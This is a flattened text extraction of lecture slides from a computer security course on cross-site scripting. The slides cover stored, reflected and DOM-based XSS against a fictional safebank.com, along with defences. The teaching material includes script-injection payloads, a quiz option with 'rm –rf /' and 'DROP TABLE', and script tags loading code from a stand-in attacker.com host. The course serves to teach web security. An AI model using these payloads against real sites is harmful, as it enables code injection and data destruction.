Transcription

Computer Security Course.SongDawnWeb Security: Vulnerabilities &AttacksDawn Song

Cross-site ScriptingDawn Song

What is Cross-site Scripting (XSS)? Vulnerability in web application thatenables attackers to inject client-sidescripts into web pages viewed byother users.Dawn Song

Type 2Type 1Type 0Three Types of XSS Type 2: Persistent or Stored– The attack vector is stored at the server Type 1: Reflected– The attack value is ‘reflected’ back by theserver Type 0: DOM Based– The vulnerability is in the client side codeDawn Song

Type 2Type 1Type 0Consider a form on safebank.com thatallows a user to chat with a customerservice associate.SAFEBANKloginpasswordAccountsBill PayMailTransfersUserbanking content1. User asks aquestion viaHTTP POST(message: “How do I get aloan?”)ServerDawn Song

Type 2Type 1Type 0Consider a form on safebank.com thatallows a user to chat with a customerservice associate.SAFEBANKloginpasswordAccountsBill PayMailTransfersUserbanking content1. User asks aquestion viaHTTP POST(message: “How do I get aloan?”)2. Server storesquestion inServerdatabase.Dawn Song

Type 2Type 1Type 0Consider a form on safebank.com thatallows a user to chat with a customerservice associate.SAFEBANKloginpasswordAccountsBill ill PayMailTransfersAssociatebanking content3.Associaterequeststhequestionspagebanking content1. User asks aquestion viaHTTP POST(message: “How do I get aloan?”)2. Server storesquestion inServerdatabase.Dawn Song

Type 2Type 1Type 0Consider a form on safebank.com thatallows a user to chat with a customerservice associate.SAFEBANKloginpasswordAccountsBill ill PayMailTransfersAssociatebanking content3.Associaterequeststhequestionspage4. Serverretrievesallquestionsfrom theDBbanking content1. User asks aquestion viaHTTP POST(message: “How do I get aloan?”)2. Server storesquestion inServerdatabase.Dawn Song

Type 2Type 1Type 0PHP CODE: ? echo " div class ’question' question /div ";? SAFEBANKHTML Code: div class ’question' ”How do I get a loan?” /div AccountsBill ill PayMailTransfersAssociatebanking content3.Associaterequeststhequestionspage5. Serverreturns HTMLembedded withthe question4. Serverretrievesallquestionsfrom theDBloginpasswordbanking content1. User asks aquestion viaHTTP POST(message: “How do I get aloan?”)2. Server storesquestion inServerdatabase.Dawn Song

Type 2Type 1Type 0PHP CODE: ? echo " div class ’question' question /div ";? SAFEBANKHTML Code: div class ’question' ”How do I get a loan?” /div AccountsBill ill PayMailTransfersAssociatebanking contentSAFEBANKCustomer5:“How do I get a loan?”3.Associaterequeststhequestionspage5. Serverreturns HTMLembedded withthe question4. Serverretrievesallquestionsfrom theDBloginpasswordbanking content1. User asks aquestion viaHTTP POST(message: “How do I get aloan?”)2. Server storesquestion inServerdatabase.Dawn Song

Type 2Type 1Type 0Type 2 XSS InjectionLook at the following code fragments. Which one ofthese could possibly be a comment that could beused to perform a XSS injection?a.b.c.d.'; system('rm –rf /');rm –rf /DROP TABLE QUESTIONS; script doEvil() /script Dawn Song

Type 2Type 1Type 0Script InjectionWhich one of these could possibly be a commentthat could be used to perform a XSS injection?a.b.c.d.'; system('rm –rf /');rm –rf /DROP TABLE QUESTIONS; script doEvil() /script html body . div class ‘question’ script doEvil() /script /div . /body /html Dawn Song

Type 2Type 1Type 0Stored XSS1. Attacker asksmalicious questionvia HTTP POST( message:“ script doEvil() /script ” )ServerDawn Song

Type 2Type 1Type 0Stored XSS1. Attacker asksmalicious questionvia HTTP POST( message:“ script doEvil() /script ” )2. ServerstoresServerquestion inDawn Song

Type 2Type 1Type 0Stored XSSSAFEBANKloginpasswordAccountsBill PayMailTransfersAssociatebanking content3. Victimrequeststhequestionspage1. Attacker asksmalicious questionvia HTTP POST( message:“ script doEvil() /script ” )2. ServerstoresServerquestion inDawn Song

Type 2Type 1Type 0Stored XSSSAFEBANKloginpasswordAccountsBill PayMailTransfersAssociatebanking content3. Victimrequeststhe4. Serverquestions retrievespagemaliciousquestionfrom the DB1. Attacker asksmalicious questionvia HTTP POST( message:“ script doEvil() /script ” )2. ServerstoresServerquestion inDawn Song

Type 2Type 1Type 0Stored XSSPHP CODE: ? echo " div class ’question' question /div ";? HTML Code: div class ’question' script doEvil() /script /div SAFEBANKloginpasswordAccountsBill PayMailTransfersAssociatebanking content3. Victimrequeststhe4. Serverquestions retrievespagemalicious1. Attacker asksmalicious questionvia HTTP POSTquestionfrom the DB( message:5. Server returns“ script doEvil() /script ” )HTML embedded2. Serverwith maliciousstoresquestionServerquestion inDawn Song

Type 2Type 1Type 0Stored XSSPHP CODE: ? echo " div class ’question' question /div ";? HTML Code: div class ’question' script doEvil() /script /div SAFEBANKloginpasswordAccountsBill PayMailTransfersAssociatebanking contentSAFEBANKCustomer5:3. Victimrequeststhe4. Serverquestions retrievespagemalicious1. Attacker asksmalicious questionvia HTTP POSTquestionfrom the DB( message:5. Server returns“ script doEvil() /script ” )HTML embedded2. Serverwith maliciousstoresquestionServerquestion inDawn Song

Type 2Type 1Type 0Three Types of XSS Type 2: Persistent or Stored– The attack vector is stored at the server Type 1: Reflected– The attack value is ‘reflected’ back bythe server Type 0: DOM Based– The vulnerability is in the client side codeDawn Song

Type 2Type 1Type 0Example Continued: Blog safebank.com also has a transaction searchinterface at search.php search.php accepts a query and shows theresults, with a helpful message at the top. ? echo “Your query GET['query'] returned num results.";? Example: Your query chocolate returned 81results.safebank.com/search.php?query chocolateSAFEBANKYour query chocolatereturned 81 results.(results) What is a possible malicious URI an attackercould use to exploit this?Dawn Song

Type 2Type 1Type 0Type 1: Reflected XSSA request to “search.php?query script doEvil() /script ”causes script injection. Note that the query is neverstored on the server, hence the term 'reflected'PHP Code: ? echo “Your query GET['query'] returned num results.";? HTML Code: Your query script doEvil() /script returned 0 resultsBut this only injects code in the attacker’s page. Theattacker needs to inject code in the user’s page for theattack to be effective.Dawn Song

Type 2Type 1Type 0Reflected XSS1. Send Emailwith malicious linksafebank.com/search.php?query script doEvil() /script User(emailclient)VulnerableServerDawn Song

Type 2Type 1Type 0Reflected XSS1. Send Emailwith malicious linksafebank.com/search.php?query script doEvil() /script 2. Click on Link with wn Song

Type 2Type 1Type 0Reflected XSS1. Send Emailwith malicious linksafebank.com/search.php?query script doEvil() /script 2. Click on Link with maliciousparamsUserYour query script doEvil() /script returned 0 results3. Server insertsmalicious params intoHTML(emailclient)VulnerableServerDawn Song

Type 2Type 1Type 0Reflected XSS1. Send Emailwith malicious linksafebank.com/search.php?query script doEvil() /script SAFEBANKloginpassword2. Click on Link with maliciousparamsYour query script doEvil() /script returned 0 results3. Server insertsmalicious params intoHTMLAccountsBill PayMailTransfersUserbanking content4. HTML with injected attackcodeVulnerableServerDawn Song

Type 2Type 1Type 0Reflected XSS1. Send Emailwith malicious linksafebank.com/search.php?query script doEvil() /script SAFEBANKloginpassword2. Click on Link with maliciousparamsYour query script doEvil() /script returned 0 results3. Server insertsmalicious params intoHTMLAccountsBill PayMailTransfersUserbanking content5. Execute embeddedmalicious script.4. HTML with injected attackcodeVulnerableServerDawn Song

Type 2Type 1Type 0Three Types of XSS Type 2: Persistent or Stored– The attack vector is stored at the server Type 1: Reflected– The attack value is ‘reflected’ back by theserver Type 0: DOM Based– The vulnerability is in the client side codeDawn Song

Type 2Type 1Type 0Type 0: Dom Based XSS Traditional XSS vulnerabilities occur in theserver side code, and the fix involvesimproving sanitization at the server side. Web 2.0 applications include significantprocessing logic, at the client side, written inJavaScript. Similar to the server, this code can also bevulnerable. When the XSS vulnerability occurs in theDawn Song

Type 2Type 1Type 0Type 0: Dom Based XSSSuppose safebank.com uses client side code todisplay a friendly welcome to the user. For example,the following code shows “Hello Joe” if the URL ishttp://safebank.com/welcome.php?name JoeHello script var pos document.URL.indexOf("name ") nt.URL.length)); /script Dawn Song

Type 2Type 1Type 0Type 0: Dom Based XSSFor the same example, which one of the followingURIs will cause untrusted script execution?Hello script var pos document.URL.indexOf("name ") nt.URL.length)); /script a. http://attacker.comb. http://safebank.com/welcome.php?name doEvil()c. http://safebank.com/welcome.php?name script doEvil() /script Dawn Song

Type 2Type 1Type 0Type 0: Dom Based XSSFor the same example, which one of the followingURIs will cause untrusted script execution?Hello script var pos document.URL.indexOf("name ") nt.URL.length)); /script a. http://attacker.comb. http://safebank.com/welcome.php?name doEvil()c. http://safebank.com/welcome.php?name script doEvil() /script Dawn Song

Type 2Type 1Type 0DOM-Based XSS1. Send Emailwith malicious linksafebank.com/welcome.php?query script doEvil() /script User(emailclient)VulnerableServerDawn Song

Type 2Type 1Type 0DOM-Based XSS1. Send Emailwith malicious linksafebank.com/welcome.php?query script doEvil() /script 2. Click on Link with wn Song

Type 2Type 1Type 0DOM-Based XSS1. Send Emailwith malicious link3. Server uses theparams in a safefashion, or ignores themalicious paramsafebank.com/welcome.php?query script doEvil() /script 2. Click on Link with wn Song

Type 2Type 1Type 0DOM-Based XSS1. Send Emailwith malicious link3. Server uses theparams in a safefashion, or ignores themalicious paramsafebank.com/welcome.php?query script doEvil() /script SAFEBANKloginpassword2. Click on Link with maliciousparamsAccountsBill PayMailTransfersUserbanking content4. Safe HTMLVulnerableServerDawn Song

Type 2Type 1Type 0DOM-Based XSS1. Send Emailwith malicious link3. Server uses theparams in a safefashion, or ignores themalicious paramsafebank.com/welcome.php?query script doEvil() /script SAFEBANKloginpassword2. Click on Link with maliciousparamsAccountsBill PayMailTransfersUserbanking content4. Safe HTML5. JavaScript code ON THE CLIENT uses themalicious params in an unsafe manner, causingVulnerableServerDawn Song

Type 2Type 1Type 0Exploiting a DOM Based XSS The attack payload (the URI) is still sent to the server,where it might be logged. In some web applications, the URI fragment is used to passarguments– E.g., Gmail, Twitter, Facebook, Consider a more Web 2.0 version of the previous example:http://example.net/welcome.php#name Joe– The browser doesn’t send the fragment “#name Joe” to theserver as part of the HTTP Request– The same attack still existsDawn Song

Type 2Type 1Type 0Three Types of XSS Type 2: Persistent or Stored– The attack vector is stored at the server Type 1: Reflected– The attack value is ‘reflected’ back by theserver Type 0: DOM Based– The vulnerability is in the client side codeDawn Song

Contexts in HTML Cross site scripting is significantlymore complex than the command orSQL injection. The main reason for this is the largenumber of contexts present in HTML. a href "http://evil.com" onclick "functionCall()" Possibly b HTML /b Text /a Dawn Song

Contexts in HTML Cross site scripting is significantlymore complex than the command orSQL injection. The main reason for this is thelargeHTML AttributeURI contexts present inContextnumberContextofHTML.Context a href "http://evil.com"onclick "functionCall()" Event HandlerPossibly b HTML /b TextContext /a HTML ContextDawn Song

Contexts in HTMLThe blogging application also accepts a ‘homepage’ from the anonymouscommenter. The application uses this value to display a helpful link: ? echo " a href '". homepage."' Home /a "; ? Which of the following values for homepagecause untrusted code execution?a. script src "http://attacker.com/evil.js" /script b. ' script src "http://attacker.com/evil.js" /script c. javascript:alert("evil code executing");Dawn Song

HTML ContextsThe blogging application also accepts a ‘homepage’ from the anonymouscommenter. The application uses this value to display a helpful link: ? echo " a href '". homepage."' Home /a "; ? Which of the following values for homepagecause untrusted code execution?a. script src "http://attacker.com/evil.js" /script b. ' script src "http://attacker.com/evil.js" /script c. javascript:alert("evil code executing");Dawn Song

HTML ContextsThe blogging application also accepts a ‘homepage’ from the anonymouscommenter. The application uses this value to display a helpful link: ? echo " a href '". homepage."' Home /a "; ? Which of the following values for homepagecause untrusted code execution?a. script src "http://attacker.com/evil.js" /script b. ' script src "http://attacker.com/evil.js" /script c. javascript:alert("evil code executing");Dawn Song

HTML ContextsThe blogging application also accepts a ‘homepage’ from the anonymouscommenter. The application uses this value to display a helpful link: ? echo " a href '". homepage."' Home /a "; ? Which of the following values for homepagecause untrusted code execution?a. script src "http://attacker.com/evil.js" /script b. ' script src "http://attacker.com/evil.js" /script c. javascript:alert("evil code executing");Dawn Song

Injection Defenses Defenses:– Input validation Whitelists untrusted inputs.– Input escaping Escape untrusted input so it will not be treated as acommand.– Use less powerful API Use an API that only does what you want. Prefer this over all other options.Dawn Song

Input ValidationCheck whether input value follows a whitelistedpattern. For example, if accepting a phonenumber from the user, JavaScript code tovalidate the input to prevent server-side XSS:function validatePhoneNumber(p){var phoneNumberPattern / \(?(\d{3})\)?[- ]?(\d{3})[- ]?(\d{4}) /;return phoneNumberPattern.test(p);}This ensures that the phone number doesn’tcontain a XSS attack vector or a SQL Injectionattack. This only works for inputs that are easilyrestricted.Dawn Song

Parameter TamperingIs the JavaScript check in the previous function onthe client sufficient to prevent XSS attacks ?a. Yesb. NoDawn Song

Parameter TamperingIs the JavaScript check in the previous functionsufficient to prevent XSS attacks ?a. Yesb. NoDawn Song

Input Escaping orSanitizationSanitize untrusted data before outputting it toHTML. Consider the HTML entities functions,which escapes ‘special’ characters. Forexample, becomes <.Our previous attack input, script src "http://attacker.com/evil.js" /script becomes<script src ript>which shows up as text in the browser.Dawn Song

Context SensitiveSanitizationWhat is the output of running htmlentities onjavascript:evilfunction();? Is it sufficient to prevent crosssite scripting? You can try out html entities online la. Yesb. NoDawn Song

Context SensitiveSanitizationWhat is the output of running htmlentities onjavascript:evilfunction();? Is it sufficient to prevent crosssite scripting? You can try out html entities online la. Yesb. NoDawn Song

Use a less powerful API The current HTML API is too powerful, it allowsarbitrary scripts to execute at any point in HTML. Content Security Policy allows you to disable allinline scripting and restrict external script loads. Disabling inline scripts, and restricting scriptloads to ‘self’ (own domain) makes XSS a lotharder. See CSP specification for more details.Dawn Song

Use a less powerful API To protect against DOM based XSS, use a lesspowerful JavaScript API. If you only want to insert untrusted text, considerusing the innerText API in JavaScript. This APIensures that the argument is only used as text. Similarly, instead of using innerHTML to insertuntrusted HTML code, use createElement to createindividual HTML tags and use innerText on each.Dawn Song

login password SAFEBANK banking content Accounts Bill Pay Mail Transfers login password SAFEBANK banking content Accounts Bill Pay Mail Transfers Consider a form on safebank.com that . HTML Code: Your query script doEvil() /script returned 0 resul